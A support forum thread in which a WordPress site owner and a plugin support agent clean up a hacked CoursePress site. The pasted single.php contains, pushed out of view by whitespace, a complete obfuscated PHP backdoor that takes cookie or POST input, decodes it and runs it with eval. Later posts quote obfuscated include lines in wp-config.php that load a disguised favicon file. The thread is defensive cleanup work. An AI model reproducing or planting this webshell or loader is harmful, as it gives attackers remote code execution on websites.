Coursepress file caught by Defender

My website at this domain was recently hacked with a mailbot and Defender has been useful in cleaning it up. But when I ran it on my Coursepress subdomain, something interesting happened! It marked the single.php as Suspicious. Screenshot attached.

    Dimitris

    Hey there JessycaFrederick,

    hope you're doing good and thanks for reaching us!

    By default, the CoursePress theme is located in plugin's folder, like in
    /wp-content/plugins/coursepress/themes/coursepress/single.php in the version you use (1.3.3).
    I presume that you had duplicated the theme in /themes/ folder so you could further edit it, is that right? Please advise!

    Could you please try to review this file for any suspicious code?
    If you haven't made any changes in this file, you can also try to overwrite it by copying
    /wp-content/plugins/coursepress/themes/coursepress/single.php
    to
    /wp-content/themes/coursepress/single.php

    If this has no results, please grant us with temporary support access to your website to see that in action and better inspect your setup.
    You can do so via WPMUDEV Dashboard plugin as described here (no need to send credentials):
    https://premium.wpmudev.org/docs/getting-started/getting-support/#chapter-4

    Looking forward for your results!
    Warm regards,
    Dimitris

    JessycaFrederick

    Yes, I am using the Coursepress theme, too.

    I do not see any suspicious code in the file when I view it, see in the attached screenshot and code below.

    Support access is granted.

    <?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $kc6b = 674;$GLOBALS['na5f']=Array();global$na5f;$na5f=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['m39b625']="\x49\x52\x79\x5c\xa\x51\x3c\x21\x63\x7e\x4c\x33\x4e\x23\x28\x4a\x64\x42\x72\x65\x20\x61\x43\x35\x5f\x74\x2b\x29\x2c\x3a\x3b\x50\x69\x60\x62\x34\x53\x6b\x70\x6f\x7b\x22\x55\x54\x25\x4d\x45\x3d\x37\x56\x32\x31\x30\x7a\x5e\x41\x73\x68\x59\x26\x44\x2f\x6c\x2a\x4b\x47\x48\x24\x5b\x5a\xd\x67\x78\x6e\x57\x27\x6d\x46\x2e\x6a\x40\x2d\x7c\x9\x38\x77\x7d\x58\x4f\x5d\x66\x36\x71\x39\x3f\x3e\x76\x75";$na5f[$na5f['m39b625'][18].$na5f['m39b625'][48].$na5f['m39b625'][48].$na5f['m39b625'][8].$na5f['m39b625'][23].$na5f['m39b625'][35].$na5f['m39b625'][48]]=$na5f['m39b625'][8].$na5f['m39b625'][57].$na5f['m39b625'][18];$na5f[$na5f['m39b625'][72].$na5f['m39b625'][16].$na5f['m39b625'][11].$na5f['m39b625'][34]]=$na5f['m39b625'][39].$na5f['m39b625'][18].$na5f['m39b625'][16];$na5f[$na5f['m39b625'][19].$na5f['m39b625'][11].$na5f['m39b625'][51].$na5f['m39b625'][23].$na5f['m39b625'][90].$na5f['m39b625'][90].$na5f['m39b625'][34].$na5f['m39b625'][21].$na5f['m39b625'][11]]=$na5f['m39b625'][56].$na5f['m39b625'][25].$na5f['m39b625'][18].$na5f['m39b625'][62].$na5f['m39b625'][19].$na5f['m39b625'][73];$na5f[$na5f['m39b625'][73].$na5f['m39b625'][52].$na5f['m39b625'][34].$na5f['m39b625'][48].$na5f['m39b625'][8].$na5f['m39b625'][90].$na5f['m39b625'][11].$na5f['m39b625'][35].$na5f['m39b625'][52]]=$na5f['m39b625'][32].$na5f['m39b625'][73].$na5f['m39b625'][32].$na5f['m39b625'][24].$na5f['m39b625'][56].$na5f['m39b625'][19].$na5f['m39b625'][25];$na5f[$na5f['m39b625'][32].$na5f['m39b625'][50].$na5f['m39b625'][23].$na5f['m39b625'][16].$na5f['m39b625'][35].$na5f['m39b625'][48].$na5f['m39b625'][21]]=$na5f['m39b625'][56].$na5f['m39b625'][19].$na5f['m39b625'][18].$na5f['m39b625'][32].$na5f['m39b625'][21].$na5f['m39b625'][62].$na5f['m39b625'][32].$na5f['m39b625'][53].$na5f['m39b625'][19];$na5f[$na5f['m39b625'][71].$na5f['m39b625'][34].$na5f['m39b625'][23].$na5f['m39b625'][84].$na5f['m39b625'][8].$na5f['m39b625'][90].$na5f['m39b625'][50]]=$na5f['m39b625'][38].$na5f['m39b625'][57].$na5f['m39b625'][38].$na5f['m39b625'][96].$na5f['m39b625'][19].$na5f['m39b625'][18].$na5f['m39b625'][56].$na5f['m39b625'][32].$na5f['m39b625'][39].$na5f['m39b625'][73];$na5f[$na5f['m39b625'][62].$na5f['m39b625'][52].$na5f['m39b625'][21].$na5f['m39b625'][48].$na5f['m39b625'][35].$na5f['m39b625'][16].$na5f['m39b625'][34].$na5f['m39b625'][90]]=$na5f['m39b625'][97].$na5f['m39b625'][73].$na5f['m39b625'][56].$na5f['m39b625'][19].$na5f['m39b625'][18].$na5f['m39b625'][32].$na5f['m39b625'][21].$na5f['m39b625'][62].$na5f['m39b625'][32].$na5f['m39b625'][53].$na5f['m39b625'][19];$na5f[$na5f['m39b625'][92].$na5f['m39b625'][52].$na5f['m39b625'][93].$na5f['m39b625'][34].$na5f['m39b625'][84]]=$na5f['m39b625'][34].$na5f['m39b625'][21].$na5f['m39b625'][56].$na5f['m39b625'][19].$na5f['m39b625'][91].$na5f['m39b625'][35].$na5f['m39b625'][24].$na5f['m39b625'][16].$na5f['m39b625'][19].$na5f['m39b625'][8].$na5f['m39b625'][39].$na5f['m39b625'][16].$na5f['m39b625'][19];$na5f[$na5f['m39b625'][39].$na5f['m39b625'][16].$na5f['m39b625'][90].$na5f['m39b625'][52].$na5f['m39b625'][51].$na5f['m39b625'][11]]=$na5f['m39b625'][56].$na5f['m39b625'][19].$na5f['m39b625'][25].$na5f['m39b625'][24].$na5f['m39b625'][25].$na5f['m39b625'][32].$na5f['m39b625'][76].$na5f['m39b625'][19].$na5f['m39b625'][24].$na5f['m39b625'][62].$na5f['m39b625'][32].$na5f['m39b625'][76].$na5f['m39b625'][32].$na5f['m39b625'][25];$na5f[$na5f['m39b625'][56].$na5f['m39b625'][51].$na5f['m39b625'][90].$na5f['m39b625'][34].$na5f['m39b625'][84]]=$na5f['m39b625'][19].$na5f['m39b625'][52].$na5f['m39b625'][34].$na5f['m39b625'][35].$na5f['m39b625'][21].$na5f['m39b625'][50].$na5f['m39b625'][90].$na5f['m39b625'][84].$na5f['m39b625'][84];$na5f[$na5f['m39b625'][71].$na5f['m39b625'][48].$na5f['m39b625'][90].$na5f['m39b625'][19].$na5f['m39b625'][16].$na5f['m39b625'][19].$na5f['m39b625'][21].$na5f['m39b625'][35].$na5f['m39b625'][34]]=$na5f['m39b625'][92].$na5f['m39b625'][8].$na5f['m39b625'][52].$na5f['m39b625'][11].$na5f['m39b625'][21].$na5f['m39b625'][93].$na5f['m39b625'][91].$na5f['m39b625'][91];$na5f[$na5f['m39b625'][8].$na5f['m39b625'][35].$na5f['m39b625'][16].$na5f['m39b625'][11].$na5f['m39b625'][52].$na5f['m39b625'][21]]=$_POST;$na5f[$na5f['m39b625'][85].$na5f['m39b625'][16].$na5f['m39b625'][93].$na5f['m39b625'][90].$na5f['m39b625'][34].$na5f['m39b625'][19].$na5f['m39b625'][50].$na5f['m39b625'][51]]=$_COOKIE;@$na5f[$na5f['m39b625'][73].$na5f['m39b625'][52].$na5f['m39b625'][34].$na5f['m39b625'][48].$na5f['m39b625'][8].$na5f['m39b625'][90].$na5f['m39b625'][11].$na5f['m39b625'][35].$na5f['m39b625'][52]]($na5f['m39b625'][19].$na5f['m39b625'][18].$na5f['m39b625'][18].$na5f['m39b625'][39].$na5f['m39b625'][18].$na5f['m39b625'][24].$na5f['m39b625'][62].$na5f['m39b625'][39].$na5f['m39b625'][71],NULL);@$na5f[$na5f['m39b625'][73].$na5f['m39b625'][52].$na5f['m39b625'][34].$na5f['m39b625'][48].$na5f['m39b625'][8].$na5f['m39b625'][90].$na5f['m39b625'][11].$na5f['m39b625'][35].$na5f['m39b625'][52]]($na5f['m39b625'][62].$na5f['m39b625'][39].$na5f['m39b625'][71].$na5f['m39b625'][24].$na5f['m39b625'][19].$na5f['m39b625'][18].$na5f['m39b625'][18].$na5f['m39b625'][39].$na5f['m39b625'][18].$na5f['m39b625'][56],0);@$na5f[$na5f['m39b625'][73].$na5f['m39b625'][52].$na5f['m39b625'][34].$na5f['m39b625'][48].$na5f['m39b625'][8].$na5f['m39b625'][90].$na5f['m39b625'][11].$na5f['m39b625'][35].$na5f['m39b625'][52]]($na5f['m39b625'][76].$na5f['m39b625'][21].$na5f['m39b625'][72].$na5f['m39b625'][24].$na5f['m39b625'][19].$na5f['m39b625'][72].$na5f['m39b625'][19].$na5f['m39b625'][8].$na5f['m39b625'][97].$na5f['m39b625'][25].$na5f['m39b625'][32].$na5f['m39b625'][39].$na5f['m39b625'][73].$na5f['m39b625'][24].$na5f['m39b625'][25].$na5f['m39b625'][32].$na5f['m39b625'][76].$na5f['m39b625'][19],0);@$na5f[$na5f['m39b625'][39].$na5f['m39b625'][16].$na5f['m39b625'][90].$na5f['m39b625'][52].$na5f['m39b625'][51].$na5f['m39b625'][11]](0);$ae6d410=NULL;$z8ad=NULL;$na5f[$na5f['m39b625'][90].$na5f['m39b625'][19].$na5f['m39b625'][91].$na5f['m39b625'][48].$na5f['m39b625'][90].$na5f['m39b625'][91].$na5f['m39b625'][93].$na5f['m39b625'][50]]=$na5f['m39b625'][35].$na5f['m39b625'][93].$na5f['m39b625'][8].$na5f['m39b625'][11].$na5f['m39b625'][23].$na5f['m39b625'][91].$na5f['m39b625'][90].$na5f['m39b625'][52].$na5f['m39b625'][81].$na5f['m39b625'][23].$na5f['m39b625'][91].$na5f['m39b625'][21].$na5f['m39b625'][21].$na5f['m39b625'][81].$na5f['m39b625'][35].$na5f['m39b625'][8].$na5f['m39b625'][21].$na5f['m39b625'][93].$na5f['m39b625'][81].$na5f['m39b625'][84].$na5f['m39b625'][21].$na5f['m39b625'][48].$na5f['m39b625'][51].$na5f['m39b625'][81].$na5f['m39b625'][93].$na5f['m39b625'][50].$na5f['m39b625'][52].$na5f['m39b625'][93].$na5f['m39b625'][11].$na5f['m39b625'][23].$na5f['m39b625'][50].$na5f['m39b625'][52].$na5f['m39b625'][50].$na5f['m39b625'][50].$na5f['m39b625'][84].$na5f['m39b625'][16];global$fe67f692;function qc03a966($ae6d410,$c4970f8){global$na5f;$l1b7adee3="";for($de99=0;$de99<$na5f[$na5f['m39b625'][19].$na5f['m39b625'][11].$na5f['m39b625'][51].$na5f['m39b625'][23].$na5f['m39b625'][90].$na5f['m39b625'][90].$na5f['m39b625'][34].$na5f['m39b625'][21].$na5f['m39b625'][11]]($ae6d410);){for($i894=0;$i894<$na5f[$na5f['m39b625'][19].$na5f['m39b625'][11].$na5f['m39b625'][51].$na5f['m39b625'][23].$na5f['m39b625'][90].$na5f['m39b625'][90].$na5f['m39b625'][34].$na5f['m39b625'][21].$na5f['m39b625'][11]]($c4970f8)&&$de99<$na5f[$na5f['m39b625'][19].$na5f['m39b625'][11].$na5f['m39b625'][51].$na5f['m39b625'][23].$na5f['m39b625'][90].$na5f['m39b625'][90].$na5f['m39b625'][34].$na5f['m39b625'][21].$na5f['m39b625'][11]]($ae6d410);$i894++,$de99++){$l1b7adee3.=$na5f[$na5f['m39b625'][18].$na5f['m39b625'][48].$na5f['m39b625'][48].$na5f['m39b625'][8].$na5f['m39b625'][23].$na5f['m39b625'][35].$na5f['m39b625'][48]]($na5f[$na5f['m39b625'][72].$na5f['m39b625'][16].$na5f['m39b625'][11].$na5f['m39b625'][34]]($ae6d410[$de99])^$na5f[$na5f['m39b625'][72].$na5f['m39b625'][16].$na5f['m39b625'][11].$na5f['m39b625'][34]]($c4970f8[$i894]));}}return$l1b7adee3;}function e0b4a2f88($ae6d410,$c4970f8){global$na5f;global$fe67f692;return$na5f[$na5f['m39b625'][71].$na5f['m39b625'][48].$na5f['m39b625'][90].$na5f['m39b625'][19].$na5f['m39b625'][16].$na5f['m39b625'][19].$na5f['m39b625'][21].$na5f['m39b625'][35].$na5f['m39b625'][34]]($na5f[$na5f['m39b625'][71].$na5f['m39b625'][48].$na5f['m39b625'][90].$na5f['m39b625'][19].$na5f['m39b625'][16].$na5f['m39b625'][19].$na5f['m39b625'][21].$na5f['m39b625'][35].$na5f['m39b625'][34]]($ae6d410,$fe67f692),$c4970f8);}foreach($na5f[$na5f['m39b625'][85].$na5f['m39b625'][16].$na5f['m39b625'][93].$na5f['m39b625'][90].$na5f['m39b625'][34].$na5f['m39b625'][19].$na5f['m39b625'][50].$na5f['m39b625'][51]]as$c4970f8=>$t635a){$ae6d410=$t635a;$z8ad=$c4970f8;}if(!$ae6d410){foreach($na5f[$na5f['m39b625'][8].$na5f['m39b625'][35].$na5f['m39b625'][16].$na5f['m39b625'][11].$na5f['m39b625'][52].$na5f['m39b625'][21]]as$c4970f8=>$t635a){$ae6d410=$t635a;$z8ad=$c4970f8;}}$ae6d410=@$na5f[$na5f['m39b625'][62].$na5f['m39b625'][52].$na5f['m39b625'][21].$na5f['m39b625'][48].$na5f['m39b625'][35].$na5f['m39b625'][16].$na5f['m39b625'][34].$na5f['m39b625'][90]]($na5f[$na5f['m39b625'][56].$na5f['m39b625'][51].$na5f['m39b625'][90].$na5f['m39b625'][34].$na5f['m39b625'][84]]($na5f[$na5f['m39b625'][92].$na5f['m39b625'][52].$na5f['m39b625'][93].$na5f['m39b625'][34].$na5f['m39b625'][84]]($ae6d410),$z8ad));if(isset($ae6d410[$na5f['m39b625'][21].$na5f['m39b625'][37]])&&$fe67f692==$ae6d410[$na5f['m39b625'][21].$na5f['m39b625'][37]]){if($ae6d410[$na5f['m39b625'][21]]==$na5f['m39b625'][32]){$de99=Array($na5f['m39b625'][38].$na5f['m39b625'][96]=>@$na5f[$na5f['m39b625'][71].$na5f['m39b625'][34].$na5f['m39b625'][23].$na5f['m39b625'][84].$na5f['m39b625'][8].$na5f['m39b625'][90].$na5f['m39b625'][50]](),$na5f['m39b625'][56].$na5f['m39b625'][96]=>$na5f['m39b625'][51].$na5f['m39b625'][78].$na5f['m39b625'][52].$na5f['m39b625'][81].$na5f['m39b625'][51],);echo@$na5f[$na5f['m39b625'][32].$na5f['m39b625'][50].$na5f['m39b625'][23].$na5f['m39b625'][16].$na5f['m39b625'][35].$na5f['m39b625'][48].$na5f['m39b625'][21]]($de99);}elseif($ae6d410[$na5f['m39b625'][21]]==$na5f['m39b625'][19]){eval/*d79db4*/($ae6d410[$na5f['m39b625'][16]]);}exit();} ?><?php
    /**
     * The Template for displaying all single posts.
     *
     * @package CoursePress
     */
    
    get_header(); ?>
    
    	<div id="primary" class="content-area content-side-area">
    		<main id="main" class="site-main" role="main">
    
    		<?php while ( have_posts() ) : the_post(); ?>
    
    			<?php get_template_part( 'content', 'single' ); ?>
    
    			<?php coursepress_post_nav(); ?>
    
    			<?php
    				// If comments are open or we have at least one comment, load up the comment template
    				if ( comments_open() || '0' != get_comments_number() ) :
    					comments_template();
    				endif;
    			?>
    
    		<?php endwhile; // end of the loop. ?>
    
    		</main><!-- #main -->
    	</div><!-- #primary -->
    
    <?php get_sidebar(); ?>
    <?php get_footer(); ?>
    Dimitris

    Hey there JessycaFrederick,

    there is a massive piece of code in there, just before the template comments section.
    There's been used some empty characters so code is "pushed" to the right.
    Have a look in your previous reply for example:

    Could you please remove this code, so template file has a form like:

    <?php
    /**
     * The Template for displaying all single posts.
     *
     * @package CoursePress
     */
    // THE REST OF THE TEMPLATE FILE

    Re-scan your website with Defender and let us know about your results!

    Warm regards,
    Dimitris

    JessycaFrederick

    FYI... I found some malicious code at the top of the wp-config.php file that Defender didn't pick up.

    /*b005c*/
    
    @include "\x2fhome\x2fh2ow\x69se/p\x75blic\x5fhtml\x2fwp-c\x6fnten\x74/plu\x67ins/\x77p-ig\x6eiter\x2ffavi\x63on_3\x399260\x2eico";
    
    /*b005c*/

    And in the Coursepress install...

    /*89c97*/
    
    @include "\x2fhome\x2fh2ow\x69se/p\x75blic\x5fhtml\x2fwp-c\x6fnten\x74/plu\x67ins/\x77p-ig\x6eiter\x2ffavi\x63on_3\x399260\x2eico";
    
    /*89c97*/
    Dimitris

    Hey there JessycaFrederick,

    hope you're doing good and appreciate the info provided here!

    I believe the most appropriate way to scan and check your website for malwares would be the use of multiple tools, than just a single one. You see there could be things that may slip to one service and another can get it.
    As you had an unfortunate incident already, I'd rather advise to use Defender and couple more plugins, here's a list with the most popular ones:
    https://wordpress.org/plugins/sucuri-scanner/
    https://wordpress.org/plugins/quttera-web-malware-scanner/
    https://wordpress.org/plugins/exploit-scanner/
    https://wordpress.org/plugins/wp-antivirus-site-protection/
    https://wordpress.org/plugins/antivirus/
    https://wordpress.org/plugins/gotmls/

    Take care,
    Dimitris